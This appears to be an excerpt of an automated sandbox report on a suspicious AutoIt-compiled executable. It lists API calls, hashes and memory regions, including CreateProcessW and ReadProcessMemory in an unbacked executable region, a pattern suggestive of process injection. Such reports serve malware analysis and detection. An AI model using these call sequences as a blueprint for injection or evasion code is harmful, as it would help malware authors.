                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003E01B9
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003E01C1
                              • Part of subcall function 003D60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003CF930), ref: 003D6154
                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003CF9CD
                            • OleInitialize.OLE32(00000000), ref: 003CFA4A
                            • CloseHandle.KERNEL32(00000000), ref: 004045C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                            • String ID: PQ$\TH$xT$%E$SH
                            • API String ID: 1986988660-2209345704
                            • Opcode ID: 0ecebce9db2a36e373cf92512b89ca569061884af6a998eaabbb84f4ec57ee01
                            • Instruction ID: 43e2980a1554f2bca34a8095710d10fafc4cd46acc4db1a65912afecf724bee3
                            • Opcode Fuzzy Hash: 0ecebce9db2a36e373cf92512b89ca569061884af6a998eaabbb84f4ec57ee01
                            • Instruction Fuzzy Hash: C5819BB4901A40CFC385EF79A945B1D7BE5FB98B06790893EA819CB372E77444848F1D

                            Control-flow Graph

                            APIs
                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003FD3D7
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • _memset.LIBCMT ref: 003C40FC
                            • _wcscpy.LIBCMT ref: 003C4150
                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003C4160
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                            • String ID: Line: $xH
                            • API String ID: 3942752672-1455260238
                            • Opcode ID: a4bb121fc5ba4c6f27865153e7a0a28f1335bdde375a0de8adbc8527baf21eb7
                            • Instruction ID: 7a4098d9bf7d1363b4a75bf0db381c95996506c679f129598b5217f647115db8
                            • Opcode Fuzzy Hash: a4bb121fc5ba4c6f27865153e7a0a28f1335bdde375a0de8adbc8527baf21eb7
                            • Instruction Fuzzy Hash: 07318D71008705AAD322EB60DC46FDF77DCAB54314F10492EFA85D61A1DF74AA48CB96

                            Control-flow Graph

                            control_flow_graph 1147 3c39d5-3c3a45 CreateWindowExW * 2 ShowWindow * 2
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: 09ad139d95151ebb1fe1e6ed86dc52344b642c5502edd2c7ed5aed1e9a9314fd
                            • Instruction ID: 5357284d8083b794ecfc478d7ec8ff6f6aa622e3ca66dcf46ce20e6e0835f0a4
                            • Opcode Fuzzy Hash: 09ad139d95151ebb1fe1e6ed86dc52344b642c5502edd2c7ed5aed1e9a9314fd
                            • Instruction Fuzzy Hash: CBF03A705402907EEA3157236C08E2B3E7DD7C7F50B00447EB900E2170CA650840CFB8

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00E93938: Sleep.KERNELBASE(000001F4), ref: 00E93949
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E93B66
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478485424.0000000000E91000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E91000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_e91000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateFileSleep
                            • String ID: K07L25CJ2DRME
                            • API String ID: 2694422964-835341977
                            • Opcode ID: ad437d35e296375cba8f4e0f471cbaf24887b03f33d6e9a8143bde40257624d7
                            • Instruction ID: e03330219c6c092bc285b752190b92e6b4a06137755e4b5fbe7c66aebdd231d2
                            • Opcode Fuzzy Hash: ad437d35e296375cba8f4e0f471cbaf24887b03f33d6e9a8143bde40257624d7
                            • Instruction Fuzzy Hash: D451AE70D04248EBEF11DBB4C855BEEBBB9AF58300F004599E609BB2C1D7B94B05CBA5

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                            • String ID:
                            • API String ID: 1559183368-0
                            • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                            • Instruction ID: 1d7a97ab53c7b5497f1e2ae2a0f3605a046daa81008ee07a317cea8cf7fcb025
                            • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                            • Instruction Fuzzy Hash: 1D51D730A00BA5DBCB268FABDC4066E77B6AF41329F258729F836962D1D7709D508F40

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003C4DDD: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,004852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003C4E0F
                            • _free.LIBCMT ref: 003FE263
                            • _free.LIBCMT ref: 003FE2AA
                              • Part of subcall function 003C6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 003C6BAD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _free$CurrentDirectoryLibraryLoad
                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                            • API String ID: 2861923089-1757145024
                            • Opcode ID: f66a5e90dd5df726fa6d15d8597e6b284d502029fc419b99819b4d51d8acfbab
                            • Instruction ID: 1787b3c467c1b6839b44d94e4c9e8ff4ddcbafdc5c3077f14fdf47a991f9a53e
                            • Opcode Fuzzy Hash: f66a5e90dd5df726fa6d15d8597e6b284d502029fc419b99819b4d51d8acfbab
                            • Instruction Fuzzy Hash: E2914A7190022DAFCF06EFA5CC919EDB7B8FF05314B10446AE916EB2A1EB74AD45CB50
                            APIs
                            • RegOpenKeyExW.KERNEL32 ref: 003C35D4
                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 003C35F5
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C3617
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 3677997916-824357125
                            APIs
                              • Part of subcall function 003C4EE5: _fseek.LIBCMT ref: 003C4EFD
                              • Part of subcall function 00429734: _wcscmp.LIBCMT ref: 00429824
                              • Part of subcall function 00429734: _wcscmp.LIBCMT ref: 00429837
                            • _free.LIBCMT ref: 004296A2
                            • _free.LIBCMT ref: 004296A9
                            • _free.LIBCMT ref: 00429714
                              • Part of subcall function 003E2D55: HeapFree.KERNEL32(00000000,00000000), ref: 003E2D69
                              • Part of subcall function 003E2D55: GetLastError.KERNEL32(00000000,?,003E9A24), ref: 003E2D7B
                            • _free.LIBCMT ref: 0042971C
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                            • String ID:
                            • API String ID: 1552873950-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                            • String ID:
                            • API String ID: 2782032738-0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: AU3!P/E$EA06
                            • API String ID: 4104443479-98412407
                            APIs
                            • _memset.LIBCMT ref: 003FEA39
                            • GetOpenFileNameW.COMDLG32(?), ref: 003FEA83
                              • Part of subcall function 003C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C4743,?,?,003C37AE,?), ref: 003C4770
                              • Part of subcall function 003E0791: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,003C72BD,00000001,00486290,?,003C3BBB,004852F8,004852E0,?,?), ref: 003E07B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Name$Path$FileFullLongOpen_memset
                            • String ID: X
                            • API String ID: 3777226403-3081909835
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            • API String ID: 1988441806-3962188686
                            APIs
                            • GetTempPathW.KERNEL32(00000104,?), ref: 004298F8
                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0042990F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Temp$FileNamePath
                            • String ID: aut
                            • API String ID: 3285503233-3010740371
                            APIs
                            • CreateProcessW.KERNEL32(?,00000000), ref: 00E93165
                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E931AB
                            Memory Dump Source
                            • Source File: 00000005.00000002.478485424.0000000000E91000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E91000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_e91000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Process$CreateMemoryRead
                            • String ID:
                            • API String ID: 2726527582-0
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            APIs
                            • _memset.LIBCMT ref: 003C4370
                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003C4415
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003C4432
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: IconNotifyShell_$_memset
                            • String ID:
                            • API String ID: 1505330794-0
                            APIs
                            • __FF_MSGBANNER.LIBCMT ref: 003E5733
                              • Part of subcall function 003EA16B: __NMSG_WRITE.LIBCMT ref: 003EA192
                              • Part of subcall function 003EA16B: __NMSG_WRITE.LIBCMT ref: 003EA19C
                            • __NMSG_WRITE.LIBCMT ref: 003E573A
                              • Part of subcall function 003EA1C8: GetModuleFileNameW.KERNEL32(00000000,004833BA,00000104,?,00000001,00000000), ref: 003EA25A
                              • Part of subcall function 003EA1C8: ___crtMessageBoxW.LIBCMT ref: 003EA308
                              • Part of subcall function 003E309F: ___crtCorExitProcess.LIBCMT ref: 003E30A5
                              • Part of subcall function 003E309F: ExitProcess.KERNEL32 ref: 003E30AE
                              • Part of subcall function 003E8B28: __getptd_noexit.LIBCMT ref: 003E8B28
                            • RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,003E0DD3,?), ref: 003E575F
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                            • String ID:
                            • API String ID: 1372826849-0
                            APIs
                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 004298BB
                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00429548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004298D1
                            • CloseHandle.KERNEL32(00000000), ref: 004298D8
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleTime
                            • String ID:
                            • API String ID: 3397143404-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID: CALL
                            • API String ID: 0-4196123274
                            APIs
                            • IsThemeActive.UXTHEME ref: 003C4834
                              • Part of subcall function 003E336C: __lock.LIBCMT ref: 003E3372
                              • Part of subcall function 003E336C: DecodePointer.KERNEL32(00000001,?,003C4849,00417C74), ref: 003E337E
                              • Part of subcall function 003E336C: EncodePointer.KERNEL32(?,?,003C4849,00417C74), ref: 003E3389
                              • Part of subcall function 003C48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000,00000000,?,00E2A300,?,003C485C), ref: 003C4915
                              • Part of subcall function 003C48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,00E2A300,?,003C485C), ref: 003C492A
                              • Part of subcall function 003C3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003C3B68
                              • Part of subcall function 003C3B3A: IsDebuggerPresent.KERNEL32 ref: 003C3B7A
                              • Part of subcall function 003C3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004852F8,004852E0,?,?), ref: 003C3BEB
                              • Part of subcall function 003C3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 003C3C6F
                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003C4874
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                            • String ID:
                            • API String ID: 1438897964-0
                            APIs
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 003C5CC7
                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 003FDD73
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            APIs
                              • Part of subcall function 003E571C: __FF_MSGBANNER.LIBCMT ref: 003E5733
                              • Part of subcall function 003E571C: __NMSG_WRITE.LIBCMT ref: 003E573A
                              • Part of subcall function 003E571C: RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,003E0DD3,?), ref: 003E575F
                            • std::exception::exception.LIBCMT ref: 003E0DEC
                            • __CxxThrowException@8.LIBCMT ref: 003E0E01
                              • Part of subcall function 003E859B: RaiseException.KERNEL32(?,?,?,00479E78,00000000,?,?,?,?,003E0E06,?,00479E78,?,00000001), ref: 003E85F0
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                            • String ID:
                            • API String ID: 3902256705-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __lock_file_memset
                            • String ID:
                            • API String ID: 26237723-0
                            APIs
                              • Part of subcall function 003E8B28: __getptd_noexit.LIBCMT ref: 003E8B28
                            • __lock_file.LIBCMT ref: 003E53EB
                              • Part of subcall function 003E6C11: __lock.LIBCMT ref: 003E6C34
                            • __fclose_nolock.LIBCMT ref: 003E53F6
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000), ref: 003C5B96
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            APIs
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            APIs
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            APIs
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            APIs
                              • Part of subcall function 003C4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 003C4BEF
                              • Part of subcall function 003E525B: __wfsopen.LIBCMT ref: 003E5266
                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,004852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003C4E0F
                              • Part of subcall function 003C4B6A: FreeLibrary.KERNEL32(00000000), ref: 003C4BA4
                              • Part of subcall function 003C4C70: _memmove.LIBCMT ref: 003C4CBA
                            Similarity
                            • API ID: Library$Free$Load__wfsopen_memmove
                            • String ID:
                            • API String ID: 1396898556-0
                            APIs
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            APIs
                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000), ref: 003C5C16
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            APIs
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            APIs
                            • __lock_file.LIBCMT ref: 003E48A6
                              • Part of subcall function 003E8B28: __getptd_noexit.LIBCMT ref: 003E8B28
                            Similarity
                            • API ID: __getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2597487223-0
                            APIs
                            • FreeLibrary.KERNEL32(?,?,004852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003C4E7E
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            APIs
                            • GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,003C72BD,00000001,00486290,?,003C3BBB,004852F8,004852E0,?,?), ref: 003E07B0
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            Similarity
                            • API ID: LongNamePath_memmove
                            • String ID:
                            • API String ID: 2514874351-0
                            APIs
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            APIs
                              • Part of subcall function 003E3217: __lock.LIBCMT ref: 003E3219
                            • __onexit_nolock.LIBCMT ref: 003E2C60
                              • Part of subcall function 003E2C88: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,003E2C65,003FB5BA,00479ED0), ref: 003E2C9B
                              • Part of subcall function 003E2C88: DecodePointer.KERNEL32(?,?,003E2C65,003FB5BA,00479ED0), ref: 003E2CA6
                              • Part of subcall function 003E2C88: __realloc_crt.LIBCMT ref: 003E2CE7
                              • Part of subcall function 003E2C88: __realloc_crt.LIBCMT ref: 003E2CFB
                              • Part of subcall function 003E2C88: EncodePointer.KERNEL32(00000000,?,?,003E2C65,003FB5BA,00479ED0), ref: 003E2D0D
                              • Part of subcall function 003E2C88: EncodePointer.KERNEL32(003FB5BA,?,?,003E2C65,003FB5BA,00479ED0), ref: 003E2D1B
                              • Part of subcall function 003E2C88: EncodePointer.KERNEL32(00000004,?,?,003E2C65,003FB5BA,00479ED0), ref: 003E2D27
                            Similarity
                            • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                            • String ID:
                            • API String ID: 3536590627-0
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 003C5C5F
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: 97e45de362e32ec994d0d080faf406b21115c766696af7014ee5bba1e1ef6249
                            • Instruction ID: 54916f5113f16a2ceb429b74e80adbf3b89c168a73d439438824398e87fed457
                            • Opcode Fuzzy Hash: 97e45de362e32ec994d0d080faf406b21115c766696af7014ee5bba1e1ef6249
                            • Instruction Fuzzy Hash: FDD0C77464020CBFE710DB80DC46FA9777CD705710F100194FD0456290D6B27D548795
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction ID: dcb189597dc40a226c011a247e1ef1002a641606442d5fc056f2e1cf0b2fb0f2
                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction Fuzzy Hash: 58B0927644020C77CE022A82EC02A493B299B41768F408020FB0C1C1A2A673A6649A89
                            APIs
                            • GetLastError.KERNEL32(00000002,00000000), ref: 0042D1FF
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: 2f0b6a03f74c1889e8b861a941d5ed7a1884a8d125bec41127e3b10fde2cc195
                            • Instruction ID: 7568c0d7553f718dac268a3e58a695a481348f671e4897d0a06e03425c5fa642
                            • Opcode Fuzzy Hash: 2f0b6a03f74c1889e8b861a941d5ed7a1884a8d125bec41127e3b10fde2cc195
                            • Instruction Fuzzy Hash: 0E716B306083118FCB15EF24D491F6AB7E0AF89314F44496EF8969B3A2DB34ED49CB56
                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 00E93949
                            Memory Dump Source
                            • Source File: 00000005.00000002.478485424.0000000000E91000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E91000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_e91000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction ID: 26628c1caf5d845f35d2208016b1784babadce213c775494af98533eecded2c5
                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction Fuzzy Hash: 5FE0E67494120DDFDB00DFF8D5497AE7BB4EF04301F100161FD01E2280D6709E50CA62
                            APIs
